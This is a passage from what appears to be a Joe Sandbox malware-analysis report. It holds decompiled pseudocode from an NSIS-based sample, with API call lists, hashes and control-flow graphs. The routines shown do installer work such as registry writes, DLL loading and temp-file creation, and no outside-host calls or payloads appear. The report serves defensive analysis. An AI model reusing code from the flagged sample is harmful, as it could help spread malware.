                                                                            					}
                                                                            				}
                                                                            				CloseHandle( *(_t86 - 0x38)); // executed
                                                                            				__eflags = _t84 - _t77;
                                                                            				if(_t84 >= _t77) {
                                                                            					goto L31;
                                                                            				} else {
                                                                            					__eflags = _t84 - 0xfffffffe;
                                                                            					if(_t84 != 0xfffffffe) {
                                                                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                            					} else {
                                                                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                            						lstrcatW(_t81,  *(_t86 - 8));
                                                                            					}
                                                                            					_push(0x200010);
                                                                            					_push(_t81);
                                                                            					E00405B9D();
                                                                            					goto L29;
                                                                            				}
                                                                            				goto L33;
                                                                            			}



















                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00403418), ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nswCA44.tmp$C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll$Call
                                                                            • API String ID: 1941528284-1044292392
                                                                            • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                            • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                                                            C-Code - Quality: 100%
                                                                            			E0040559F(signed int _a4, WCHAR* _a8) {
                                                                            				struct HWND__* _v8;
                                                                            				signed int _v12;
                                                                            				WCHAR* _v32;
                                                                            				long _v44;
                                                                            				int _v48;
                                                                            				void* _v52;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				WCHAR* _t27;
                                                                            				signed int _t28;
                                                                            				long _t29;
                                                                            				signed int _t37;
                                                                            				signed int _t38;
                                                                            
                                                                            				_t27 =  *0x433ee4;
                                                                            				_v8 = _t27;
                                                                            				if(_t27 != 0) {
                                                                            					_t37 =  *0x434fb4;
                                                                            					_v12 = _t37;
                                                                            					_t38 = _t37 & 0x00000001;
                                                                            					if(_t38 == 0) {
                                                                            						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                            					}
                                                                            					_t27 = lstrlenW(0x42c248);
                                                                            					_a4 = _t27;
                                                                            					if(_a8 == 0) {
                                                                            						L6:
                                                                            						if((_v12 & 0x00000004) == 0) {
                                                                            							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                                            						}
                                                                            						if((_v12 & 0x00000002) == 0) {
                                                                            							_v32 = 0x42c248;
                                                                            							_v52 = 1;
                                                                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                            							_v44 = 0;
                                                                            							_v48 = _t29 - _t38;
                                                                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                            						}
                                                                            						if(_t38 != 0) {
                                                                            							_t28 = _a4;
                                                                            							0x42c248[_t28] = 0;
                                                                            							return _t28;
                                                                            						}
                                                                            					} else {
                                                                            						_t27 = lstrlenW(_a8) + _a4;
                                                                            						if(_t27 < 0x1000) {
                                                                            							_t27 = lstrcatW(0x42c248, _a8);
                                                                            							goto L6;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t27;
                                                                            			}


















                                                                            APIs
                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                            • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00403418), ref: 004055FA
                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040560C
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000), ref: 00406779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll
                                                                            • API String ID: 1495540970-3423461562
                                                                            • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                            • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 649 40689a-4068ba GetSystemDirectoryW 650 4068bc 649->650 651 4068be-4068c0 649->651 650->651 652 4068d1-4068d3 651->652 653 4068c2-4068cb 651->653 654 4068d4-406907 wsprintfW LoadLibraryExW 652->654 653->652 655 4068cd-4068cf 653->655 655->654
                                                                            C-Code - Quality: 100%
                                                                            			E0040689A(intOrPtr _a4) {
                                                                            				short _v576;
                                                                            				signed int _t13;
                                                                            				struct HINSTANCE__* _t17;
                                                                            				signed int _t19;
                                                                            				void* _t24;
                                                                            
                                                                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                            				if(_t13 > 0x104) {
                                                                            					_t13 = 0;
                                                                            				}
                                                                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                            					_t19 = 1;
                                                                            				} else {
                                                                            					_t19 = 0;
                                                                            				}
                                                                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                            				return _t17;
                                                                            			}









                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                            • wsprintfW.USER32 ref: 004068EC
                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 656 405a6e-405ab9 CreateDirectoryW 657 405abb-405abd 656->657 658 405abf-405acc GetLastError 656->658 659 405ae6-405ae8 657->659 658->659 660 405ace-405ae2 SetFileSecurityW 658->660 660->657 661 405ae4 GetLastError 660->661 661->659
                                                                            C-Code - Quality: 100%
                                                                            			E00405A6E(WCHAR* _a4) {
                                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                                            				int _t22;
                                                                            				long _t23;
                                                                            
                                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                            				_v36.Owner = 0x4083f8;
                                                                            				_v36.Group = 0x4083f8;
                                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                                            				_v36.Revision = 1;
                                                                            				_v36.Control = 4;
                                                                            				_v36.Dacl = 0x4083e8;
                                                                            				_v16.nLength = 0xc;
                                                                            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                            				if(_t22 != 0) {
                                                                            					L1:
                                                                            					return 0;
                                                                            				}
                                                                            				_t23 = GetLastError();
                                                                            				if(_t23 == 0xb7) {
                                                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					return GetLastError();
                                                                            				}
                                                                            				return _t23;
                                                                            			}








                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • GetLastError.KERNEL32 ref: 00405AC5
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                            • GetLastError.KERNEL32 ref: 00405AE4
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3449924974-3355392842
                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 662 713c1817-713c1856 call 713c1bff 666 713c185c-713c1860 662->666 667 713c1976-713c1978 662->667 668 713c1869-713c1876 call 713c2480 666->668 669 713c1862-713c1868 call 713c243e 666->669 674 713c1878-713c187d 668->674 675 713c18a6-713c18ad 668->675 669->668 678 713c187f-713c1880 674->678 679 713c1898-713c189b 674->679 676 713c18cd-713c18d1 675->676 677 713c18af-713c18cb call 713c2655 call 713c1654 call 713c1312 GlobalFree 675->677 684 713c191e-713c1924 call 713c2655 676->684 685 713c18d3-713c191c call 713c1666 call 713c2655 676->685 701 713c1925-713c1929 677->701 682 713c1888-713c1889 call 713c2b98 678->682 683 713c1882-713c1883 678->683 679->675 680 713c189d-713c189e call 713c2e23 679->680 694 713c18a3 680->694 697 713c188e 682->697 689 713c1885-713c1886 683->689 690 713c1890-713c1896 call 713c2810 683->690 684->701 685->701 689->675 689->682 700 713c18a5 690->700 694->700 697->694 700->675 705 713c192b-713c1939 call 713c2618 701->705 706 713c1966-713c196d 701->706 712 713c193b-713c193e 705->712 713 713c1951-713c1958 705->713 706->667 708 713c196f-713c1970 GlobalFree 706->708 708->667 712->713 714 713c1940-713c1948 712->714 713->706 715 713c195a-713c1965 call 713c15dd 713->715 714->713 716 713c194a-713c194b FreeLibrary 714->716 715->706 716->713
                                                                            C-Code - Quality: 88%
                                                                            			E713C1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                            				void _v36;
                                                                            				char _v136;
                                                                            				struct HINSTANCE__* _t37;
                                                                            				intOrPtr _t42;
                                                                            				void* _t48;
                                                                            				void* _t49;
                                                                            				void* _t50;
                                                                            				void* _t54;
                                                                            				intOrPtr _t57;
                                                                            				signed int _t61;
                                                                            				signed int _t63;
                                                                            				void* _t67;
                                                                            				void* _t68;
                                                                            				void* _t72;
                                                                            				void* _t76;
                                                                            
                                                                            				_t76 = __esi;
                                                                            				_t68 = __edi;
                                                                            				_t67 = __edx;
                                                                            				 *0x713c506c = _a8;
                                                                            				 *0x713c5070 = _a16;
                                                                            				 *0x713c5074 = _a12;
                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x713c5048, E713C1651);
                                                                            				_push(1);
                                                                            				_t37 = E713C1BFF();
                                                                            				_t54 = _t37;
                                                                            				if(_t54 == 0) {
                                                                            					L28:
                                                                            					return _t37;
                                                                            				} else {
                                                                            					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                            						E713C243E(_t54);
                                                                            					}
                                                                            					_push(_t54);
                                                                            					E713C2480(_t67);
                                                                            					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                            					if(_t57 == 0xffffffff) {
                                                                            						L14:
                                                                            						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                            							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                            								_push(_t54);
                                                                            								_t37 = E713C2655();
                                                                            							} else {
                                                                            								_push(_t76);
                                                                            								_push(_t68);
                                                                            								_t61 = 8;
                                                                            								_t13 = _t54 + 0x1018; // 0x1018
                                                                            								memcpy( &_v36, _t13, _t61 << 2);
                                                                            								_t42 = E713C1666(_t54,  &_v136);
                                                                            								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                            								_t18 = _t54 + 0x1018; // 0x1018
                                                                            								_t72 = _t18;
                                                                            								_push(_t54);
                                                                            								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                            								 *_t72 = 4;
                                                                            								E713C2655();
                                                                            								_t63 = 8;
                                                                            								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                            							}
                                                                            						} else {
                                                                            							_push(_t54);
                                                                            							E713C2655();
                                                                            							_t37 = GlobalFree(E713C1312(E713C1654(_t54)));
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                            							_t37 = E713C2618(_t54);
                                                                            							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                            								_t37 =  *(_t54 + 0x1008);
                                                                            								if(_t37 != 0) {
                                                                            									_t37 = FreeLibrary(_t37);
                                                                            								}
                                                                            							}
                                                                            							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                            								_t37 = E713C15DD( *0x713c5068);
                                                                            							}
                                                                            						}
                                                                            						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                            							goto L28;
                                                                            						} else {
                                                                            							return GlobalFree(_t54);
                                                                            						}
                                                                            					}
                                                                            					_t48 =  *_t54;
                                                                            					if(_t48 == 0) {
                                                                            						if(_t57 != 1) {
                                                                            							goto L14;
                                                                            						}
                                                                            						E713C2E23(_t54);
                                                                            						L12:
                                                                            						_t54 = _t48;
                                                                            						L13:
                                                                            						goto L14;
                                                                            					}
                                                                            					_t49 = _t48 - 1;
                                                                            					if(_t49 == 0) {
                                                                            						L8:
                                                                            						_t48 = E713C2B98(_t57, _t54); // executed
                                                                            						goto L12;
                                                                            					}
                                                                            					_t50 = _t49 - 1;
                                                                            					if(_t50 == 0) {
                                                                            						E713C2810(_t54);
                                                                            						goto L13;
                                                                            					}
                                                                            					if(_t50 != 1) {
                                                                            						goto L14;
                                                                            					}
                                                                            					goto L8;
                                                                            				}
                                                                            			}



















                                                                            APIs
                                                                              • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E74
                                                                              • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E79
                                                                              • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C18C5
                                                                            • FreeLibrary.KERNEL32(?), ref: 713C194B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C1970
                                                                              • Part of subcall function 713C243E: GlobalAlloc.KERNEL32(00000040,?), ref: 713C246F
                                                                              • Part of subcall function 713C2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,713C1896,00000000), ref: 713C28E0
                                                                              • Part of subcall function 713C1666: wsprintfW.USER32 ref: 713C1694
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3962662361-3916222277
                                                                            • Opcode ID: 6874092dda179c61d70ed431fcff42a9a9750950c63711e19e788dc961c12fba
                                                                            • Instruction ID: 7b202262028477fc522adec54db0ba6ef0dd75bd4032aab17588c9f72c6dab22
                                                                            • Opcode Fuzzy Hash: 6874092dda179c61d70ed431fcff42a9a9750950c63711e19e788dc961c12fba
                                                                            • Instruction Fuzzy Hash: 5641B472504306DBEB019F64D884FD63BBCBF05B5CF144465ED469A0CADBB4D886E7A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 719 40248a-4024bb call 402da6 * 2 call 402e36 726 4024c1-4024cb 719->726 727 402c2a-402c39 719->727 728 4024cd-4024da call 402da6 lstrlenW 726->728 729 4024de-4024e1 726->729 728->729 732 4024e3-4024f4 call 402d84 729->732 733 4024f5-4024f8 729->733 732->733 737 402509-40251d RegSetValueExW 733->737 738 4024fa-402504 call 4032b4 733->738 741 402522-402603 RegCloseKey 737->741 742 40251f 737->742 738->737 741->727 742->741
                                                                            C-Code - Quality: 83%
                                                                            			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                            				void* _t20;
                                                                            				void* _t21;
                                                                            				int _t24;
                                                                            				long _t25;
                                                                            				int _t30;
                                                                            				intOrPtr _t33;
                                                                            				void* _t34;
                                                                            				intOrPtr _t37;
                                                                            				void* _t39;
                                                                            				void* _t42;
                                                                            
                                                                            				_t42 = __eflags;
                                                                            				_t33 = __edx;
                                                                            				_t30 = __ebx;
                                                                            				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                            				_t34 = __eax;
                                                                            				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                            				 *(_t39 - 0x44) = E00402DA6(2);
                                                                            				_t20 = E00402DA6(0x11);
                                                                            				 *(_t39 - 4) = 1;
                                                                            				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                            				 *(_t39 + 8) = _t21;
                                                                            				if(_t21 != __ebx) {
                                                                            					_t24 = 0;
                                                                            					if(_t37 == 1) {
                                                                            						E00402DA6(0x23);
                                                                            						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                                            					}
                                                                            					if(_t37 == 4) {
                                                                            						 *0x40b5f0 = E00402D84(3);
                                                                            						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                            						_t24 = _t37;
                                                                            					}
                                                                            					if(_t37 == 3) {
                                                                            						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                                                            					}
                                                                            					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                                            					if(_t25 == 0) {
                                                                            						 *(_t39 - 4) = _t30;
                                                                            					}
                                                                            					_push( *(_t39 + 8));
                                                                            					RegCloseKey(); // executed
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                            				return 0;
                                                                            			}














                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 00402515
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nswCA44.tmp
                                                                            • API String ID: 2655323295-1613134589
                                                                            • Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                                            • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                            • Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                                            • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 744 40605c-406068 745 406069-40609d GetTickCount GetTempFileNameW 744->745 746 4060ac-4060ae 745->746 747 40609f-4060a1 745->747 749 4060a6-4060a9 746->749 747->745 748 4060a3 747->748 748->749
                                                                            C-Code - Quality: 100%
                                                                            			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                            				intOrPtr _v8;
